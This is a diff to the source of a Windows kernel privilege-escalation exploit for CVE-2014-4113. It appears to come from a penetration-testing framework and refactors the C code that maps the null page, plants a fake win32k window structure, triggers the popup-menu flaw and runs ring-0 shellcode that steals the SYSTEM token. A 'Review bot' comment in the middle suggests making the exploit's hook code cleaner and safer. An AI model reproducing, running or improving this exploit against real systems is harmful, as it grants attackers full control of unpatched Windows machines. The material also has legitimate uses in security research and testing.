diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll
index cc1dc87d63..7fea19cac3 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x64.dll differ
diff --git a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll
index 7f5fc4240b..6edd668351 100755
Binary files a/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll and b/data/exploits/CVE-2014-4113/cve-2014-4113.x86.dll differ
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113.sln b/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
index 62c99261f9..4e51163178 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113.sln
@@ -1,9 +1,9 @@
 
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Express 2013 for Windows Desktop
-VisualStudioVersion = 12.0.30723.0
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
 MinimumVisualStudioVersion = 10.0.40219.1
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{E80F11CD-6698-492F-B4B0-1A2348A24BB0}"
 EndProject
 Global
 GlobalSection(SolutionConfigurationPlatforms) = preSolution
@@ -13,14 +13,14 @@ Global
 Release|x64 = Release|x64
 EndGlobalSection
 GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
- {6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.ActiveCfg = Debug|Win32
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|Win32.Build.0 = Debug|Win32
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.ActiveCfg = Debug|x64
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Debug|x64.Build.0 = Debug|x64
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.ActiveCfg = Release|Win32
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|Win32.Build.0 = Release|Win32
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.ActiveCfg = Release|x64
+ {E80F11CD-6698-492F-B4B0-1A2348A24BB0}.Release|x64.Build.0 = Release|x64
 EndGlobalSection
 GlobalSection(SolutionProperties) = preSolution
 HideSolutionNode = FALSE
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
index b9cafa1a06..72d02dfdb1 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@@ -2,6 +2,9 @@
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
 #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+// Uncomment this line to enable to debug output
+//#define DEBUGGING
+
 // Purloined from ntstatus.h
 #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
@@ -9,23 +12,17 @@
 #include
 #undef WIN32_NO_STATUS
+#ifdef DEBUGGING
+// only needed because of the output printf stuff when debugging
+#include
+#endif
+
 #ifndef _NTDEF_
 typedef __success(return >= 0) LONG NTSTATUS;
 typedef NTSTATUS *PNTSTATUS;
 #endif
-#define DEBUGGING FALSE
-
-#ifdef _M_X64
-typedef unsigned __int64 QWORD;
-typedef QWORD *PQWORD;
-#endif
-
-int WndProcClue = 0;
-int HookCallbackClue = 0;
-WNDPROC lpPrevWndFunc;
-DWORD MyProcessId = 0;
-DWORD OffsetWindows = 0;
+#define PTR_SIZE sizeof(UINT_PTR)
 typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 IN HANDLE ProcessHandle,
@@ -34,21 +31,22 @@ typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
 IN PSIZE_T RegionSize,
 IN ULONG AllocationType,
 IN ULONG Protect
- );
+);
 typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
 IN HANDLE ProcessId,
 OUT PVOID Process
- );
+);
 typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
 _In_ DWORD SystemInformationClass,
 _Inout_ PVOID SystemInformation,
 _In_ ULONG SystemInformationLength,
 _Out_opt_ PULONG ReturnLength
- );
+);
-typedef struct _SYSTEM_MODULE {
+typedef struct _SYSTEM_MODULE
+{
 HANDLE Reserved1;
 PVOID Reserved2;
 PVOID ImageBaseAddress;
@@ -61,44 +59,60 @@ typedef struct _SYSTEM_MODULE {
 BYTE Name[256];
 } SYSTEM_MODULE, *PSYSTEM_MODULE;
-
-typedef struct _SYSTEM_MODULE_INFORMATION {
+typedef struct _SYSTEM_MODULE_INFORMATION
+{
 ULONG ModulesCount;
 SYSTEM_MODULE Modules[0];
 } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+BOOL bWndProcFlag = FALSE;
+BOOL bHookCallbackFlag = FALSE;
+
+WNDPROC lpPrevWndFunc;
+DWORD dwMyProcessId = 0;
+DWORD dwOffsetWindows = 0;
+
 lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
 lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
+#ifdef DEBUGGING
+void dprintf(char* pszFormat, ...)
+{
+ char s_acBuf[2048];
+ va_list args;
+ va_start(args, pszFormat);
+ vsprintf_s(s_acBuf, sizeof(s_acBuf) - 1, pszFormat, args);
+ OutputDebugString(s_acBuf);
+ va_end(args);
+}
+#else
+#define dprintf(...)
+#endif
-long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
+long CALLBACK hook_callback_two(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
 {
 EndMenu();
 return -5;
 }
-LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
-#ifdef _M_X64
- if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
-#else
- if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
-#endif
+LRESULT CALLBACK hook_callback(int code, WPARAM wParam, LPARAM lParam)
+{
+ if (*(DWORD *)(lParam + PTR_SIZE * 2) == 0x1EB && !bHookCallbackFlag)
 {
- HookCallbackClue = 1;
- if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
-#ifdef _M_X64
- lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
-#else
- lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
-#endif
+ bHookCallbackFlag = TRUE;
+ if (UnhookWindowsHook(WH_CALLWNDPROC, hook_callback))
+ {
+ lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(*(HWND *)(lParam + PTR_SIZE * 3), GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);
 }
 }
 return CallNextHookEx(0, code, wParam, lParam);
 }
-LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
- if (msg == 289 && WndProcClue != 1) {
- WndProcClue = 1;
+LRESULT CALLBACK wnd_proc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam)
+{
+ if (msg == 289 && !bWndProcFlag)
+ {
+ bWndProcFlag = TRUE;
 PostMessageA(hwnd, 256, 40, 0);
 PostMessageA(hwnd, 256, 39, 0);
 PostMessageA(hwnd, 513, 0, 0);
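Review bot: `hook_callback` still reaches into the `CWPSTRUCT` that `lParam` points to with hand-computed offsets (`lParam + PTR_SIZE * 2` for the message, `lParam + PTR_SIZE * 3` for the window), which is the old `#ifdef _M_X64` pair folded into arithmetic rather than removed. Casting to the documented type says the same thing without the magic and needs no `PTR_SIZE` at all: `PCWPSTRUCT pCwp = (PCWPSTRUCT)lParam;` / `if (pCwp->message == 0x1EB && !bHookCallbackFlag)` / `lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA(pCwp->hwnd, GWLP_WNDPROC, (ULONG_PTR)hook_callback_two);`. The hook also dereferences `lParam` before looking at `code`; the WH_CALLWNDPROC contract is to hand a negative code straight to `CallNextHookEx`, so `if (code >= HC_ACTION && ...)` is the safe form. A one-line comment naming `0x1EB` (the menu-window lookup message the exploit is waiting for, if I read the trigger correctly) would spare the next reader a trip to the win32k disassembly.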
@@ -106,380 +120,375 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
 return DefWindowProc(hwnd, msg, wParam, lParam);
 }
+DWORD_PTR __stdcall get_threadinfo_ptr(void)
+{
 #ifdef _M_X64
-QWORD MyPtiCurrent(void) {
- void *teb = (void *)__readgsqword(0x30);
- QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
-
- return Win32ThreadInfo;
-}
+ PBYTE pTeb = (PBYTE)__readgsqword(0x30);
+ return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x78));
 #else
-DWORD __stdcall MyPtiCurrent() {
- __asm {
- mov eax, fs : 18h
- mov eax, [eax + 40h]
- }
-}
+ PBYTE pTeb = (PBYTE)__readfsdword(0x18);
+ return (DWORD_PTR)*((PDWORD_PTR)(pTeb + 0x40));
 #endif
+}
-int _stdcall shellcode_ring0(int one, int two, int three, int four) {
+int _stdcall shellcode_ring0(int one, int two, int three, int four)
+{
 void *my_process_info = NULL;
 void *system_info = NULL;
- pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
+ pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &my_process_info);
 pPsLookupProcessByProcessId((HANDLE)4, &system_info);
- *(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
+ *(PDWORD)((PBYTE)my_process_info + dwOffsetWindows) = *(PDWORD)((PBYTE)system_info + dwOffsetWindows);
 return 0;
 }
-void
-LogMessage(char* pszFormat, ...)
{
- if (DEBUGGING != TRUE) {
- return;
- }
- static char s_acBuf[2048];
- va_list args;
- va_start(args, pszFormat);
- vsprintf(s_acBuf, pszFormat, args);
- printf("%s\n", s_acBuf);
- OutputDebugString(s_acBuf);
- va_end(args);
-}
-
-DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
+DWORD WINAPI execute_payload(LPVOID lpPayload)
+{
 VOID(*lpCode)() = (VOID(*)())lpPayload;
 lpCode();
 return ERROR_SUCCESS;
 }
-void Win32kNullPage(LPVOID lpPayload) {
- HWND hWnd;
- WNDCLASSA WndClass;
- LPBYTE promise_land = NULL;
- HMODULE hNtdll = NULL;
- HMODULE ntkrnl = NULL;
- NTSTATUS status;
- PULONG pSystemInfoBuffer = NULL;
- lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
- ULONG SystemInfoBufferSize = 0;
- char nt_name[256];
- PVOID nt_base;
- OSVERSIONINFOA VersionInformation;
+void win32k_null_page(LPVOID lpPayload)
+{
+ WNDCLASSA wndClass;
+ char szNtName[256];
+ PVOID pNtBase;
+ OSVERSIONINFOA versionInfo;
 // Getting Windows version
- LogMessage("[*] Getting Windows version...");
- memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
- VersionInformation.dwOSVersionInfoSize = 148;
- if (!GetVersionExA(&VersionInformation)) {
- LogMessage("[!] Failed to get windows version");
+ dprintf("[*] Getting Windows version...");
+ memset(&versionInfo, 0, sizeof(OSVERSIONINFOA));
+ versionInfo.dwOSVersionInfoSize = 148;
+
+ if (!GetVersionExA(&versionInfo))
+ {
+ dprintf("[!] Failed to get windows version");
 return;
 }
 #ifdef _M_X64
- if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
- LogMessage("[*] Windows 6.1 found...");
- OffsetWindows = 0x208;
+ if (versionInfo.dwMajorVersion == 6 && versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+ {
+ // Ex: Windows 7 SP1
+ dprintf("[*] Windows 6.1 found...");
+ dwOffsetWindows = 0x208;
 }
 #else
- if (VersionInformation.dwMajorVersion == 6) {
- if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
- LogMessage("[*] Windows 6.1 found...");
- OffsetWindows = 0xf8;
+ if (versionInfo.dwMajorVersion == 6)
+ {
+ if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+ {
+ // Ex: Windows 7 SP1
+ dprintf("[*] Windows 6.1 found...");
+ dwOffsetWindows = 0xf8;
 }
- else if (!VersionInformation.dwMinorVersion) {
- LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
- OffsetWindows = 0xe0;
+ else if (!versionInfo.dwMinorVersion)
+ {
+ // Ex: Windows 2008 R2
+ dprintf("[*] Windows 6.0 found...");
+ dwOffsetWindows = 0xe0;
 }
- else {
- LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
+ else
+ {
+ dprintf("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", versionInfo.dwMinorVersion);
 return;
 }
 }
- else if (VersionInformation.dwMajorVersion == 5) {
- if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
- LogMessage("[*] Windows 5.1 found...");
- OffsetWindows = 0xc8;
+ else if (versionInfo.dwMajorVersion == 5)
+ {
+ if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 1)
+ {
+ // Ex: Windows XP SP3
+ dprintf("[*] Windows 5.1 found...");
+ dwOffsetWindows = 0xc8;
 }
- else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
- LogMessage("[*] Windows 5.2 found...");
- OffsetWindows = 0xd8;
+ else if (versionInfo.dwMinorVersion && versionInfo.dwMinorVersion == 2)
+ {
+ // Ex: Windows 2003 SP2
+ dprintf("[*] Windows 5.2 found...");
+ dwOffsetWindows = 0xd8;
 }
- else {
- LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
+ else
+ {
+ dprintf("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
 return;
 }
 }
 #endif
- else {
- LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
+ else
+ {
+ dprintf("[!] Major Version %d found, not supported", versionInfo.dwMajorVersion);
 return;
 }
 // Solve symbols
- LogMessage("[*] Solving symbols...");
+ dprintf("[*] Solving symbols...");
- hNtdll = LoadLibraryA("ntdll");
- if (hNtdll == NULL) {
- LogMessage("[!] Failed to Load ntdll...");
+ HMODULE hNtdll = LoadLibraryA("ntdll");
+ if (hNtdll == NULL)
+ {
+ dprintf("[!] Failed to Load ntdll...");
 return;
 }
- pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
- if (pZwQuerySystemInformation == NULL) {
- LogMessage("[!] Failed to solve ZwQuerySystemInformation");
+ lZwQuerySystemInformation pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+ if (pZwQuerySystemInformation == NULL)
+ {
+ dprintf("[!] Failed to solve ZwQuerySystemInformation");
 return;
 }
 pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
- if (pNtAllocateVirtualMemory == NULL) {
- LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
+ if (pNtAllocateVirtualMemory == NULL)
+ {
+ dprintf("[!] Failed to solve NtAllocateVirtualMemory");
 return;
 }
- LogMessage("[*] Requesting Kernel loaded modules...");
+ dprintf("[*] Requesting Kernel loaded modules...");
- status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
-
- if (SystemInfoBufferSize == 0) {
- LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
- return;
- }
- else {
- LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
- }
-
- pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
- if (pSystemInfoBuffer == NULL) {
- LogMessage("[!] Allocation for SystemInfo failed");
+ ULONG ulSystemInfoBufferSize = 0;
+ pZwQuerySystemInformation(11, &ulSystemInfoBufferSize, 0, &ulSystemInfoBufferSize);
+ if (ulSystemInfoBufferSize == 0)
+ {
+ dprintf("[!] Requesting pZwQuerySystemInformation required length failed");
 return;
 }
- status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
+ dprintf("[*] pZwQuerySystemInformation required length %d", ulSystemInfoBufferSize);
- if (status != STATUS_SUCCESS) {
- LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
+ PULONG pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, ulSystemInfoBufferSize);
+ if (pSystemInfoBuffer == NULL)
+ {
+ dprintf("[!] Allocation for SystemInfo failed");
 return;
 }
+ if (pZwQuerySystemInformation(11, pSystemInfoBuffer, ulSystemInfoBufferSize, &ulSystemInfoBufferSize) != STATUS_SUCCESS)
+ {
+ dprintf("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
+ return;
+ }
- LogMessage("[*] Parsing SYSTEM_INFO...");
+ dprintf("[*] Parsing SYSTEM_INFO...");
 SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
- LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
+ dprintf("[*] %d Kernel modules found", smi->ModulesCount);
- memset(nt_name, 0, 256);
+ memset(szNtName, 0, 256);
- int i = 0;
- while (i < smi->ModulesCount) {
+ ULONG i = 0;
+ while (i < smi->ModulesCount)
+ {
 SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
- LogMessage("[*] Checking module %s", sm->Name);
- if (strstr((char *)sm->Name, ".exe")) {
+ dprintf("[*] Checking module %s", sm->Name);
+ if (strstr((char *)sm->Name, ".exe"))
+ {
 char *start = strstr((char *)sm->Name, "nt");
- if (start != NULL) {
- nt_base = sm->ImageBaseAddress;
- strncpy_s(nt_name, 256, start, _TRUNCATE);
+ if (start != NULL)
+ {
+ pNtBase = sm->ImageBaseAddress;
+ strncpy_s(szNtName, 256, start, _TRUNCATE);
 break;
 }
 }
 i++;
 }
- if (nt_name == NULL) {
- LogMessage("[!] nt not found");
+ if (szNtName == NULL)
+ {
+ dprintf("[!] nt not found");
 return;
 }
- else {
- LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
- }
+ dprintf("[*] Good! nt found as %s at 0x%08x", szNtName, pNtBase);
- ntkrnl = LoadLibraryA(nt_name);
+ HMODULE hNtKrnl = LoadLibraryA(szNtName);
- LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
+ dprintf("[*] %s loaded in userspace at: %08x", szNtName, hNtKrnl);
- pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
+ pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(hNtKrnl, "PsLookupProcessByProcessId");
- if (pPsLookupProcessByProcessId == NULL) {
- LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
+ if (pPsLookupProcessByProcessId == NULL)
+ {
+ dprintf("[!] Failed to solve PsLookupProcessByProcessId");
 return;
 }
-#ifdef _M_X64
- pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
- LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
-#else
- pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
- LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
-#endif
+ pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD_PTR)pNtBase + ((DWORD_PTR)pPsLookupProcessByProcessId - (DWORD_PTR)hNtKrnl));
+ dprintf("[*] pPsLookupProcessByProcessId in kernel: 0x%p", pPsLookupProcessByProcessId);
- MyProcessId = GetCurrentProcessId();
+ dwMyProcessId = GetCurrentProcessId();
 // Register Class
- LogMessage("[*] Registering class...");
+ dprintf("[*] Registering class...");
- memset(&WndClass, 0, sizeof(WNDCLASSA));
- WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
- WndClass.lpszClassName = "woqunimalegebi";
+ memset(&wndClass, 0, sizeof(WNDCLASSA));
+ wndClass.lpfnWndProc = wnd_proc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
+ wndClass.lpszClassName = "woqunimalegebi";
- if (RegisterClassA(&WndClass) == 0) {
- LogMessage("[!] RegisterClassA failed ");
+ if (!RegisterClassA(&wndClass))
+ {
+ dprintf("[!] RegisterClassA failed ");
 return;
 }
 // Create Window
- LogMessage("[*] Creating window...");
- hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
+ dprintf("[*] Creating window...");
+ HWND hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
- if (hWnd == NULL) {
- LogMessage("[!] CreateWindowExA failed");
+ if (hWnd == NULL)
+ {
+ dprintf("[!] CreateWindowExA failed");
 return;
 }
 // Making everything ready for exploitation...
- LogMessage("[*] Allocating null page...");
+ dprintf("[*] Allocating null page...");
 #ifdef _M_X64
- ULONGLONG base_address = 0x00000000fffffffb;
+ ULONGLONG dwBaseAddress = 0x00000000fffffffb;
 #else
- DWORD base_address = 1;
+ DWORD dwBaseAddress = 1;
 #endif
- SIZE_T region_size = 0x1000;
- ULONG zero_bits = 0;
- HANDLE current_process = NULL;
- current_process = GetCurrentProcess();
+ SIZE_T sRegionSize = 0x1000;
+ ULONG ulAllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
- if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
- LogMessage("[!] Failed to allocate null page");
+ if (pNtAllocateVirtualMemory(GetCurrentProcess(), (LPVOID*)&dwBaseAddress, 0, &sRegionSize, ulAllocationType, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
+ {
+ dprintf("[!] Failed to allocate null page");
 return;
 }
- LogMessage("[*] Getting PtiCurrent...");
+ dprintf("[*] Getting PtiCurrent...");
-#ifdef _M_X64
- ULONGLONG pti = MyPtiCurrent();
-#else
- DWORD pti = MyPtiCurrent();
-#endif
+ DWORD_PTR dwThreadInfoPtr = get_threadinfo_ptr();
- if (pti == 0) {
+ if (dwThreadInfoPtr == 0)
+ {
 LoadLibrary("user32.dll");
 LoadLibrary("gdi32.dll");
- pti = MyPtiCurrent();
+ dwThreadInfoPtr = get_threadinfo_ptr();
 }
- if (pti == 0) {
- LogMessage("[!] Filed to get PtiCurrent");
+ if (dwThreadInfoPtr == 0)
+ {
+ dprintf("[!] Filed to get current thread information");
 return;
 }
- else {
-#ifdef _M_X64
- LogMessage("[*] Good! pti 0x%016llx", pti);
-#else
- LogMessage("[*] Good! pti 0x%08x", pti);
-#endif
- }
- LogMessage("[*] Creating a fake structure at NULL...");
+ dprintf("[*] Good! dwThreadInfoPtr 0x%p", dwThreadInfoPtr);
+ dprintf("[*] Creating a fake structure at NULL...");
+ LPVOID lpPtr = NULL;
 #ifdef _M_X64
- void *test = NULL;
- (QWORD)test = 0x10000000B;
- *((PQWORD)test) = pti;
+ (DWORD_PTR)lpPtr = 0x10000000B;
+ *((PDWORD_PTR)lpPtr) = dwThreadInfoPtr;
 /* win32k!tagWND->bServerSideWindowProc = TRUE */
- (QWORD)test = 0x100000025;
- *((PBYTE)test) = 4;
+ (DWORD_PTR)lpPtr = 0x100000025;
+ *((PBYTE)lpPtr) = 4;
 /* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
- (QWORD)test = 0x10000008B;
- *((PQWORD)test) = &shellcode_ring0;
+ (DWORD_PTR)lpPtr = 0x10000008B;
+ *((PDWORD_PTR)lpPtr) = (DWORD_PTR)shellcode_ring0;
 #else
- void *test = promise_land + 3;
+ LPBYTE lpPromisedLand = NULL;
+ lpPtr = lpPromisedLand + 3;
 /* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen) .text:BF8B93F4 02C mov edi, _gptiCurrent .text:BF8B93FA 02C cmp edi, [esi + 8]; .text:BF8B93FD 02C jz loc_BF8B */
- *(LPDWORD)test = pti;
+ *(LPDWORD)lpPtr = dwThreadInfoPtr;
- *((LPBYTE)(promise_land + 0x11)) = 0x4;
+ *((LPBYTE)(lpPromisedLand + 0x11)) = 0x4;
- test = promise_land + 0x5b;
- *(LPDWORD)test = (DWORD)shellcode_ring0;
+ lpPtr = lpPromisedLand + 0x5b;
+ *(LPDWORD)lpPtr = (DWORD)shellcode_ring0;
 #endif
 // Exploit!
- LogMessage("[*] Triggering vulnerability...");
- HMENU MenuOne = CreatePopupMenu();
- if (MenuOne == NULL) {
- LogMessage("[!] First CreatePopupMenu failed");
+ dprintf("[*] Triggering vulnerability...");
+ HMENU hMenuOne = CreatePopupMenu();
+ if (hMenuOne == NULL)
+ {
+ dprintf("[!] First CreatePopupMenu failed");
 return;
 }
- MENUITEMINFOA MenuOneInfo;
- memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
- MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
- MenuOneInfo.fMask = MIIM_STRING;
+ MENUITEMINFOA menuOneInfo;
+ memset(&menuOneInfo, 0, sizeof(MENUITEMINFOA));
+ menuOneInfo.cbSize = sizeof(MENUITEMINFOA);
+ menuOneInfo.fMask = MIIM_STRING;
- if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
- LogMessage("[!] First InsertMenuItemA failed");
- DestroyMenu(MenuOne);
+ if (InsertMenuItemA(hMenuOne, 0, TRUE, &menuOneInfo) != TRUE)
+ {
+ dprintf("[!] First InsertMenuItemA failed");
+ DestroyMenu(hMenuOne);
 return;
 }
- HMENU MenuTwo = CreatePopupMenu();
- if (MenuTwo == NULL) {
- LogMessage("[!] Second CreatePopupMenu failed");
- DestroyMenu(MenuOne);
+ HMENU hMenuTwo = CreatePopupMenu();
+ if (hMenuTwo == NULL)
+ {
+ dprintf("[!] Second CreatePopupMenu failed");
+ DestroyMenu(hMenuOne);
 return;
 }
- MENUITEMINFOA MenuTwoInfo;
- memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
- MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
- MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
- MenuTwoInfo.dwTypeData = "";
- MenuTwoInfo.cch = 1;
- MenuTwoInfo.hSubMenu = MenuOne;
- if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
- LogMessage("[!] Second InsertMenuItemA failed");
- DestroyMenu(MenuTwo);
- DestroyMenu(MenuOne);
+ MENUITEMINFOA menuTwoInfo;
+ memset(&menuTwoInfo, 0, sizeof(MENUITEMINFOA));
+ menuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
+ menuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
+ menuTwoInfo.dwTypeData = "";
+ menuTwoInfo.cch = 1;
+ menuTwoInfo.hSubMenu = hMenuOne;
+
+ if (InsertMenuItemA(hMenuTwo, 0, TRUE, &menuTwoInfo) != TRUE)
+ {
+ dprintf("[!] Second InsertMenuItemA failed");
+ DestroyMenu(hMenuTwo);
+ DestroyMenu(hMenuOne);
 return;
 }
